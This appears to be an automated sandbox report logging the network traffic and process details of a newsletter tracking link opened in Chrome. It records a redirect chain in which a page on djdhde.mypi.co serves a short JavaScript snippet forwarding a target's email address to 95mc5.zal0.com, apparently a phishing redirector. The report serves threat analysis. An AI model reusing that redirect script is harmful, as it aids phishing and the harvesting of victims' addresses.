                              3 | 192.168.2.4 | 49738 | 23.237.26.135 | 443 | 3716 | C:\Program Files\Google\Chrome\Application\chrome.exe
                              Timestamp | Bytes transferred | Direction | Data
                              2024-02-07 21:34:29 UTC | 745 | OUT | GET /sss?utm_source=capils-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=new-post HTTP/1.1
                              Host: djdhde.mypi.co
                              Connection: keep-alive
                              Upgrade-Insecure-Requests: 1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: navigate
                              Sec-Fetch-User: ?1
                              Sec-Fetch-Dest: document
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              sec-ch-ua-platform: "Windows"
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-07 21:34:29 UTC | 296 | IN | HTTP/1.1 301 Moved Permanently
                              Date: Wed, 07 Feb 2024 21:34:29 GMT
                              Server: Apache
                              Location: https://djdhde.mypi.co/sss/?utm_source=capils-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=new-post
                              Content-Length: 328
                              Connection: close
                              Content-Type: text/html; charset=iso-8859-1
                              2024-02-07 21:34:29 UTC | 328 | IN
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://djdhde.mypi.co/sss/?utm_source=capils-newsletter.beehiiv.com&amp;utm_m


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              4 | 192.168.2.4 | 49739 | 23.237.26.135 | 443 | 3716 | C:\Program Files\Google\Chrome\Application\chrome.exe
                              Timestamp | Bytes transferred | Direction | Data
                              2024-02-07 21:34:29 UTC | 746 | OUT | GET /sss/?utm_source=capils-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=new-post HTTP/1.1
                              Host: djdhde.mypi.co
                              Connection: keep-alive
                              Upgrade-Insecure-Requests: 1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: navigate
                              Sec-Fetch-User: ?1
                              Sec-Fetch-Dest: document
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              sec-ch-ua-platform: "Windows"
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-07 21:34:30 UTC | 159 | IN | HTTP/1.1 200 OK
                              Date: Wed, 07 Feb 2024 21:34:30 GMT
                              Server: Apache
                              Connection: close
                              Transfer-Encoding: chunked
                              Content-Type: text/html; charset=UTF-8
                              2024-02-07 21:34:30 UTC | 243 | IN
                              Data Ascii: e8<html> <body></body> <script> var u = window.location.href.lastIndexOf("/") + 1; var d = window.location.href.substring(u); window.location.replace("https://95mc5.zal0.com/1c59/" + d); </script></html> 0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              5 | 192.168.2.4 | 49740 | 104.21.42.31 | 443 | 3716 | C:\Program Files\Google\Chrome\Application\chrome.exe
                              Timestamp | Bytes transferred | Direction | Data
                              2024-02-07 21:34:30 UTC | 723 | OUT | GET /1c59/marketing@virtualintelligencebriefing.com HTTP/1.1
                              Host: 95mc5.zal0.com
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              sec-ch-ua-platform: "Windows"
                              Upgrade-Insecure-Requests: 1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                              Sec-Fetch-Site: cross-site
                              Sec-Fetch-Mode: navigate
                              Sec-Fetch-Dest: document
                              Referer: https://djdhde.mypi.co/
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-07 21:34:31 UTC | 589 | IN | HTTP/1.1 404 Not Found
                              Date: Wed, 07 Feb 2024 21:34:31 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FG%2BfyszLrrBCWercKIshC902%2FplEgx%2FXeKvH%2BixlHMYPY31RpWzM5YCxH68UPwHF80HBq%2Bkh69RWzjwmbw319zrhC5J9DkCMytc0PHC9ry5uKvfClRrSUj38vv77mrJOkg%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 851ec1e36dff0d16-ATL
                              alt-svc: h3=":443"; ma=86400
                              2024-02-07 21:34:31 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              6 | 192.168.2.4 | 49741 | 23.33.136.127 | 443
                              Timestamp | Bytes transferred | Direction | Data
                              2024-02-07 21:34:31 UTC | 161 | OUT | HEAD /fs/windows/config.json HTTP/1.1
                              Connection: Keep-Alive
                              Accept: */*
                              Accept-Encoding: identity
                              User-Agent: Microsoft BITS/7.8
                              Host: fs.microsoft.com
                              2024-02-07 21:34:31 UTC | 533 | IN | HTTP/1.1 200 OK
                              Content-Type: application/octet-stream
                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                              X-Ms-ApiVersion: Distribute 1.2
                              X-Ms-Region: prod-eus2-z1
                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                              X-MSEdge-Ref: Ref A: BE71B5831CA04805BAA298A51D13B882 Ref B: BLUEDGE1705 Ref C: 2024-02-07T01:18:20Z
                              Cache-Control: public, max-age=186226
                              Date: Wed, 07 Feb 2024 21:34:31 GMT
                              Connection: close
                              X-CID: 2


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              7 | 192.168.2.4 | 49744 | 23.33.136.127 | 443
                              Timestamp | Bytes transferred | Direction | Data
                              2024-02-07 21:34:31 UTC | 239 | OUT | GET /fs/windows/config.json HTTP/1.1
                              Connection: Keep-Alive
                              Accept: */*
                              Accept-Encoding: identity
                              If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                              Range: bytes=0-2147483646
                              User-Agent: Microsoft BITS/7.8
                              Host: fs.microsoft.com
                              2024-02-07 21:34:31 UTC | 531 | IN | HTTP/1.1 200 OK
                              Content-Type: application/octet-stream
                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                              ApiVersion: Distribute 1.1
                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                              X-Azure-Ref: 0URSoYgAAAABePpjyRlUAQrduejDbkqt8U0pDRURHRTA1MjAAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm
                              Cache-Control: public, max-age=132790
                              Date: Wed, 07 Feb 2024 21:34:31 GMT
                              Content-Length: 55
                              Connection: close
                              X-CID: 2
                              2024-02-07 21:34:31 UTC | 55 | IN
                              Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              8 | 192.168.2.4 | 49745 | 35.190.80.1 | 443 | 3716 | C:\Program Files\Google\Chrome\Application\chrome.exe
                              Timestamp | Bytes transferred | Direction | Data
                              2024-02-07 21:34:31 UTC | 543 | OUT | OPTIONS /report/v3?s=%2FG%2BfyszLrrBCWercKIshC902%2FplEgx%2FXeKvH%2BixlHMYPY31RpWzM5YCxH68UPwHF80HBq%2Bkh69RWzjwmbw319zrhC5J9DkCMytc0PHC9ry5uKvfClRrSUj38vv77mrJOkg%3D%3D HTTP/1.1
                              Host: a.nel.cloudflare.com
                              Connection: keep-alive
                              Origin: https://95mc5.zal0.com
                              Access-Control-Request-Method: POST
                              Access-Control-Request-Headers: content-type
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-07 21:34:32 UTC | 336 | IN | HTTP/1.1 200 OK
                              Content-Length: 0
                              access-control-max-age: 86400
                              access-control-allow-methods: OPTIONS, POST
                              access-control-allow-origin: *
                              access-control-allow-headers: content-length, content-type
                              date: Wed, 07 Feb 2024 21:34:31 GMT
                              Via: 1.1 google
                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                              Connection: close


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              9 | 192.168.2.4 | 49746 | 35.190.80.1 | 443 | 3716 | C:\Program Files\Google\Chrome\Application\chrome.exe
                              Timestamp | Bytes transferred | Direction | Data
                              2024-02-07 21:34:32 UTC | 486 | OUT | POST /report/v3?s=%2FG%2BfyszLrrBCWercKIshC902%2FplEgx%2FXeKvH%2BixlHMYPY31RpWzM5YCxH68UPwHF80HBq%2Bkh69RWzjwmbw319zrhC5J9DkCMytc0PHC9ry5uKvfClRrSUj38vv77mrJOkg%3D%3D HTTP/1.1
                              Host: a.nel.cloudflare.com
                              Connection: keep-alive
                              Content-Length: 453
                              Content-Type: application/reports+json
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-07 21:34:32 UTC | 453 | OUT
                              Data Ascii: [{"age":0,"body":{"elapsed_time":1083,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://djdhde.mypi.co/","sampling_fraction":1.0,"server_ip":"104.21.42.31","status_code":404,"type":"http.error"},"type":"network-error","url":"h
                              2024-02-07 21:34:32 UTC | 168 | IN | HTTP/1.1 200 OK
                              Content-Length: 0
                              date: Wed, 07 Feb 2024 21:34:32 GMT
                              Via: 1.1 google
                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                              Connection: close


                              Session ID | Source IP | Source Port | Destination IP | Destination Port
                              10 | 192.168.2.4 | 49756 | 74.125.136.100 | 443
                              Timestamp | Bytes transferred | Direction | Data
                              2024-02-07 21:35:55 UTC | 449 | OUT | GET /tools/pso/ping?as=chrome&brand=ONGR&pid=&hl=en&events=C1I,C2I,C7I,C1S,C7S&rep=2&rlz=C1:,C2:,C7:&id=0000000000000000000000000000000000000000B5F725C74D HTTP/1.1
                              Host: clients1.google.com
                              Connection: keep-alive
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: empty
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept-Encoding: gzip, deflate, br
                              2024-02-07 21:35:56 UTC | 817 | IN | HTTP/1.1 200 OK
                              Content-Security-Policy: script-src 'report-sample' 'nonce-6iO4FBQ6Wl5SgndR_QGMew' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/download-dt/1
                              Content-Security-Policy: script-src 'report-sample' 'nonce-6aQ3pZn1eqfFrw7tRx2uBQ' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/download-dt/1
                              Content-Type: text/plain; charset=utf-8
                              Content-Length: 219
                              Date: Wed, 07 Feb 2024 21:35:56 GMT
                              Expires: Wed, 07 Feb 2024 21:35:56 GMT
                              Cache-Control: private, max-age=0
                              X-Content-Type-Options: nosniff
                              X-Frame-Options: SAMEORIGIN
                              X-XSS-Protection: 1; mode=block
                              Server: GSE
                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                              Connection: close
                              2024-02-07 21:35:56 UTC | 219 | IN
                              Data Ascii: rlzC1: 1C1ONGR_enUS1096rlzC2: 1C2ONGR_enUS1096rlzC7: 1C7ONGR_enUS1096dcc: set_dcc: C1:1C1ONGR_enUS1096,C2:1C2ONGR_enUS1096,C7:1C7ONGR_enUS1096events: C1I,C2I,C7I,C1S,C7Sstateful-events: C1I,C2I,C7Icrc32: a339cad


                              Target ID:0
                              Start time:22:34:24
                              Start date:07/02/2024
                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
                              Imagebase:0x7ff76e190000
                              File size:3'242'272 bytes
                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:false

                              Target ID:2
                              Start time:22:34:25
                              Start date:07/02/2024
                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2016,i,9153540945449359898,776365275202532557,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                              Imagebase:0x7ff76e190000
                              File size:3'242'272 bytes
                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:false

                              Target ID:3
                              Start time:22:34:27
                              Start date:07/02/2024
                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" "https://link.mail.beehiiv.com/ls/click?upn=fBLT-2BLuQl3NwiQlY-2FUB-2F7yZK63rzVbOt6SRjyVrBIqFzFDo8M-2Fg4Bo4-2BO4hpom8z7ZLuxy2QxlYMgW1Gzy6pwCm23aez0vVyhBm7eCGwE0WdMbo1BXh-2BFRtbcaklbKh26FDy0n-2FdQ9t7RCwaH39WupxeBlLns-2FCYgl5f1ctJEhM-3DLmFo_AmeWD5ZsKC-2B3ZheZjnDpbUkAKgKl5WpTuOJCpyDqXRc8K-2FlFlJ4-2Bn1zDfmQE1bOIB5-2BmaBYS52bqAMuImdaBWt-2B7NcvDjHLSjDEqun4F40VGOju6f5eraMm-2BmA2cI4TwN5m-2FdXmsuh3AvB8I3hqCf5Su72C52AB82bXT78OFaGhLdykrKPYdzAmNePbUMkJfeZ1o1xXkpY533PpjggEufwqS96U2lHFtuM0AF0XznjCWvz2-2FAJxdv2yOU4Rja8sE1aVzAzUItssHkUW9tujzTKsHooxa0T1wqU-2BXsNw6IZYMBuNd2XQD3BPavL2FyKwgqOl-2BNlCpAsuRQyxxqbQ0sxmCsvEzI2nw166vYROKCjGmPPQtR1NyNiLpj317EtiqLrlvsktdS8N6bgTfK0t-2FA2HLcAR1clK9xdGWlVkoBfmmnRGIBboAePQ8ToZagwj4auB1PmTKZ9aQMtFdh-2FNJV17VPUH2ibgU2d8MV21fLKU-3D#/?/%23/?/marketing@virtualintelligencebriefing.com
                              Imagebase:0x7ff76e190000
                              File size:3'242'272 bytes
                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:true

                              No disassembly